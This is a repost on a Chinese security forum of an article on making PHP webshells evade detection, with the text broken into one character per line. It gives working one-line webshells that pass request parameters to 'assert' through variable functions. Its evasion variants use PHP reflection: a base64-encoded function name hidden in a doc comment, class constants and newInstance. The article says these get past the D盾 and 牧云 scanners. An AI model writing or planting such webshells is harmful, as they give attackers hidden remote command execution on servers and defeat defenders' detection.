论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
免杀
[22289] 2021-08-26_Webshell免杀的思考与学习
文档创建者:
s7ckTeam
浏览次数:
4
最后更新:
2025-01-18
免杀
4 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2021-08-26_Webshell免杀的思考与学习
W
e
b
s
h
e
l
l
免
杀
的
思
考
与
学
习
I
s
a
b
e
l
l
a
e
L
e
m
o
n
S
e
c
2
0
2
1
-
0
8
-
2
6
前
言
前
言
对
于
渗
透
测
试
者
来
说
是
既
是
一
种
结
束
也
是
一
种
开
始
;
一
个
免
杀
的
是
我
们
在
渗
透
测
试
过
程
中
能
否
拿
到
目
标
权
限
的
一
个
“
前
提
”
,
首
先
w
e
b
s
h
e
l
l
需
要
存
活
,
其
次
是
否
能
够
执
行
命
令
,
最
后
我
们
使
用
w
e
b
s
h
e
l
l
管
理
工
具
时
流
量
是
否
被
拦
截
。
所
以
免
杀
至
关
重
要
。
我
的
第
一
个
一
句
话
木
马
我
的
第
一
个
一
句
话
木
马
很
奇
怪
,
我
学
习
安
全
接
触
的
的
第
一
个
一
句
话
木
马
就
是
它
:
,
并
且
令
我
印
象
深
刻
。
当
时
不
太
理
解
这
个
是
因
为
P
H
P
太
灵
活
了
,
没
想
到
还
有
这
种
写
法
:
$
a
=
'
a
s
s
e
r
t
'
;
$
a
(
)
;
这
个
木
马
和
上
面
的
例
子
一
样
,
是
一
种
可
变
函
数
,
写
为
字
符
串
,
写
为
命
令
。
值
得
一
提
的
是
a
s
s
e
r
t
和
e
v
a
l
:
手
册
写
到
e
v
a
l
(
)
不
是
一
个
函
数
而
是
一
个
语
言
构
造
器
,
所
以
不
能
被
可
变
函
数
调
用
;
e
v
a
l
(
)
把
字
符
串
按
照
P
H
P
代
码
来
计
算
。
该
字
符
串
必
须
是
合
法
的
P
H
P
代
码
,
且
必
须
以
分
号
结
尾
且
必
须
以
分
号
结
尾
。
而
a
s
s
e
r
t
(
)
是
一
个
函
数
,
所
以
它
相
比
e
v
a
l
灵
活
许
多
,
可
以
被
可
变
函
数
调
用
,
也
可
以
被
回
调
函
数
来
调
用
。
#
#
思
考
我
们
通
过
w
e
b
s
h
e
l
l
执
行
命
令
,
是
通
过
我
们
可
控
的
参
数
来
达
到
目
的
,
而
上
面
的
一
句
话
木
马
我
们
可
控
的
部
分
为
P
O
S
T
和
G
E
T
参
数
。
只
要
稍
作
改
变
就
可
以
绕
过
D
盾
的
检
测
w
e
b
s
h
e
l
l
w
e
b
s
h
e
l
l
$
_
G
E
T
[
1
]
(
$
_
P
O
S
T
[
2
]
)
;
$
_
G
E
T
[
1
]
a
s
s
e
r
t
$
_
P
O
S
T
[
2
]
p
h
p
i
n
f
o
(
)
<
?
p
h
p
f
o
r
e
a
c
h
(
a
r
r
a
y
(
'
_
G
E
T
'
)
a
s
$
_
r
e
q
u
e
s
t
)
{
f
o
r
e
a
c
h
(
$
$
_
r
e
q
u
e
s
t
a
s
$
_
k
e
y
=
>
$
_
v
a
l
u
e
)
{
$
$
_
k
e
y
=
$
_
v
a
l
u
e
;
$
_
k
e
y
(
$
_
v
a
l
u
e
)
;
}
}
可
以
看
到
这
里
并
没
有
达
到
免
杀
效
果
接
下
来
我
又
写
了
一
个
正
常
的
类
与
函
数
,
再
次
扫
描
发
现
D
盾
已
经
检
测
不
出
来
了
从
可
变
函
数
的
例
子
我
们
可
以
受
到
一
些
启
发
,
通
过
翻
阅
P
H
P
手
册
中
的
反
射
反
射
部
分
,
我
们
可
以
得
到
一
些
可
以
利
用
的
函
数
少
见
的
函
数
少
见
的
函
数
获
取
注
释
获
取
注
释
P
H
P
中
有
这
样
一
个
函
数
,
它
可
以
获
取
p
h
p
注
释
的
内
容
某
些
查
杀
引
擎
在
查
杀
的
时
候
,
会
做
类
似
于
编
译
器
的
优
化
,
去
掉
我
们
所
写
的
注
释
。
毕
竟
注
释
是
不
能
运
行
的
,
如
果
我
们
将
参
数
通
过
非
常
规
的
方
式
传
输
进
来
,
这
样
或
许
可
以
绕
过
一
些
查
杀
引
擎
呢
。
我
们
知
道
,
安
全
狗
查
形
,
D
盾
查
参
,
就
拿
D
盾
来
试
一
试
。
p
u
b
l
i
c
R
e
f
l
e
c
t
i
o
n
C
l
a
s
s
:
:
g
e
t
D
o
c
C
o
m
m
e
n
t
(
v
o
i
d
)
:
s
t
r
i
n
g
<
?
p
h
p
/
*
*
*
Y
X
N
z
Z
X
J
0
Y
W
E
=
*
/
c
l
a
s
s
E
x
a
m
p
l
e
{
p
u
b
l
i
c
f
u
n
c
t
i
o
n
f
n
(
)
{
}
}
$
r
e
f
l
e
c
t
o
r
=
n
e
w
R
e
f
l
e
c
t
i
o
n
C
l
a
s
s
(
'
E
x
a
m
p
l
e
'
)
;
$
z
h
u
s
h
i
=
s
u
b
s
t
r
(
(
$
r
e
f
l
e
c
t
o
r
-
>
g
e
t
D
o
c
C
o
m
m
e
n
t
(
)
)
,
7
,
1
2
)
;
$
z
h
u
s
h
i
=
b
a
s
e
6
4
_
d
e
c
o
d
e
(
$
z
h
u
s
h
i
)
;
$
z
h
u
s
h
i
=
s
u
b
s
t
r
(
$
z
h
u
s
h
i
,
0
,
6
)
;
/
/
f
o
r
e
a
c
h
(
a
r
r
a
y
(
'
_
P
O
S
T
'
,
'
_
G
E
T
'
)
a
s
$
_
r
e
q
u
e
s
t
)
{
f
o
r
e
a
c
h
(
$
$
_
r
e
q
u
e
s
t
a
s
$
_
k
e
y
=
>
$
_
v
a
l
u
e
)
{
$
$
_
k
e
y
=
$
_
v
a
l
u
e
;
p
r
i
n
t
_
r
(
$
$
_
r
e
q
u
e
s
t
)
;
}
}
$
z
h
u
s
h
i
(
$
_
v
a
l
u
e
)
;
获
取
定
义
过
的
一
个
常
量
获
取
定
义
过
的
一
个
常
量
p
u
b
l
i
c
R
e
f
l
e
c
t
i
o
n
C
l
a
s
s
:
:
g
e
t
C
o
n
s
t
a
n
t
s
(
v
o
i
d
)
:
a
r
r
a
y
获
取
某
个
类
的
全
部
已
定
义
的
常
量
,
不
管
可
见
性
如
何
定
义
。
c
l
a
s
s
T
e
s
t
{
c
o
n
s
t
a
=
'
A
s
'
;
c
o
n
s
t
b
=
'
s
e
'
;
c
o
n
s
t
c
=
'
r
t
'
;
p
u
b
l
i
c
f
u
n
c
t
i
o
n
_
_
c
o
n
s
t
r
u
c
t
(
)
{
}
}
$
p
a
r
a
1
;
$
p
a
r
a
2
;
$
r
e
f
l
e
c
t
o
r
=
n
e
w
R
e
f
l
e
c
t
i
o
n
C
l
a
s
s
(
'
T
e
s
t
'
)
;
f
o
r
(
$
i
=
9
7
;
$
i
<
=
9
9
;
$
i
+
+
)
{
$
p
a
r
a
1
=
$
r
e
f
l
e
c
t
o
r
-
>
g
e
t
C
o
n
s
t
a
n
t
(
c
h
r
(
$
i
)
)
;
$
p
a
r
a
2
.
=
$
p
a
r
a
1
;
}
f
o
r
e
a
c
h
(
a
r
r
a
y
(
'
_
P
O
S
T
'
,
'
_
G
E
T
'
)
a
s
$
_
r
e
q
u
e
s
t
)
{
f
o
r
e
a
c
h
(
$
$
_
r
e
q
u
e
s
t
a
s
$
_
k
e
y
=
>
$
_
v
a
l
u
e
)
{
$
$
_
k
e
y
=
$
_
v
a
l
u
e
;
}
}
$
p
a
r
a
2
(
$
_
v
a
l
u
e
)
;
获
取
一
组
常
量
获
取
一
组
常
量
获
取
某
个
类
的
全
部
已
定
义
的
常
量
,
不
管
可
见
性
如
何
定
义
。
<
?
p
h
p
c
l
a
s
s
T
e
s
t
{
c
o
n
s
t
a
=
a
r
r
a
y
(
1
=
>
'
a
S
'
,
2
=
>
'
s
e
'
,
3
=
>
'
r
T
'
)
;
p
u
b
l
i
c
f
u
n
c
t
i
o
n
_
_
c
o
n
s
t
r
u
c
t
(
)
{
}
}
$
r
e
f
l
=
n
e
w
R
e
f
l
e
c
t
i
o
n
C
l
a
s
s
(
'
T
e
s
t
'
)
;
f
o
r
e
a
c
h
(
$
r
e
f
l
-
>
g
e
t
C
o
n
s
t
a
n
t
s
(
)
a
s
$
k
e
y
=
>
$
v
a
l
u
e
)
{
f
o
r
e
a
c
h
(
$
v
a
l
u
e
a
s
$
k
e
y
=
>
$
v
a
l
u
e
1
)
{
$
v
a
l
u
e
2
.
=
$
v
a
l
u
e
1
;
}
}
f
o
r
e
a
c
h
(
a
r
r
a
y
(
'
_
P
O
S
T
'
,
'
_
G
E
T
'
)
a
s
$
_
r
e
q
u
e
s
t
)
{
f
o
r
e
a
c
h
(
$
$
_
r
e
q
u
e
s
t
a
s
$
_
k
e
y
=
>
$
_
v
a
l
u
e
)
{
$
$
_
k
e
y
=
$
_
v
a
l
u
e
;
}
}
$
v
a
l
u
e
2
(
$
_
v
a
l
u
e
)
;
p
u
b
l
i
c
R
e
f
l
e
c
t
i
o
n
C
l
a
s
s
:
:
g
e
t
C
o
n
s
t
a
n
t
s
(
v
o
i
d
)
:
a
r
r
a
y
类
与
继
承
类
与
继
承
P
牛
的
《
P
H
P
动
态
特
性
的
捕
捉
与
逃
逸
》
中
提
到
了
一
个
点
,
除
了
P
P
T
里
提
到
的
t
r
i
c
k
,
还
能
想
到
什
么
呢
?
面
向
对
象
中
,
类
能
够
继
承
类
的
属
性
与
方
法
。
或
许
可
以
从
这
两
个
点
入
手
,
因
为
测
试
绕
过
了
"
牧
云
"
,
就
暂
时
不
放
出
来
结
果
了
。
至
于
为
什
么
可
以
绕
过
:
我
的
猜
想
是
这
个
函
数
不
在
黑
名
单
中
,
语
法
分
析
不
够
完
善
,
引
擎
认
为
我
们
的
v
u
l
n
代
码
并
不
能
执
行
。
创
建
类
的
实
例
创
建
类
的
实
例
简
单
地
说
,
这
个
方
法
可
以
创
建
一
个
类
的
实
例
,
同
时
该
函
数
传
递
的
参
数
会
传
递
到
该
类
的
构
造
函
数
需
要
注
意
的
是
,
该
方
法
传
参
和
p
u
b
l
i
c
R
e
f
l
e
c
t
i
o
n
C
l
a
s
s
:
:
n
e
w
I
n
s
t
a
n
c
e
(
m
i
x
e
d
$
a
r
g
s
[
,
m
i
x
e
d
$
.
.
.
]
)
:
o
b
j
e
c
t
相
似
,
不
能
使
用
引
用
类
型
传
参
,
如
果
要
使
用
引
用
类
型
使
用
另
一
个
方
法
c
l
a
s
s
T
e
s
t
1
{
p
u
b
l
i
c
f
u
n
c
t
i
o
n
_
_
c
o
n
s
t
r
u
c
t
(
$
p
a
r
a
)
{
/
/
a
s
s
e
r
t
}
}
$
c
l
a
s
s
1
=
n
e
w
R
e
f
l
e
c
t
i
o
n
C
l
a
s
s
(
"
T
e
s
t
1
"
)
;
$
p
a
r
a
=
'
'
;
/
/
可
控
的
$
p
a
r
a
$
c
l
a
s
s
2
=
$
c
l
a
s
s
1
-
>
n
e
w
I
n
s
t
a
n
c
e
(
$
p
a
r
a
)
;
基
本
的
框
架
就
是
这
样
了
,
对
框
架
进
行
变
形
也
可
绕
过
"
牧
云
"
。
渗
透
工
具
|
提
权
|
内
网
|
S
R
C
|
C
S
端
安
全
测
试
|
安
全
加
固
等
资
料
分
享
A
p
a
c
h
e
T
o
m
c
a
t
自
动
W
A
R
部
署
和
渗
透
测
试
工
具
h
a
s
h
认
证
概
念
与
h
a
s
h
破
解
方
式
(
工
具
使
用
方
式
)
c
a
l
l
_
u
s
e
r
_
f
u
n
c
(
)
n
e
w
I
n
s
t
a
n
c
e
A
r
g
s
作
者
:
I
s
a
b
e
l
l
a
e
,
转
载
于
先
知
社
区
。
蓝
队
攻
防
|
如
何
在
没
有
日
志
的
情
况
下
跟
踪
事
件
?
代
码
审
计
相
关
知
识
与
资
料
分
享
渗
透
测
试
情
报
收
集
工
具
w
e
b
l
o
g
i
c
漏
洞
扫
描
工
具
s
p
r
i
n
g
框
架
漏
洞
扫
描
蓝
队
防
守
反
制
欢
迎
关
注
欢
迎
关
注
L
e
m
o
n
S
e
c
觉
得
不
错
点
个
觉
得
不
错
点
个
“
赞
赞
”
、
、
“
在
看
在
看
”
哦
哦
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
免杀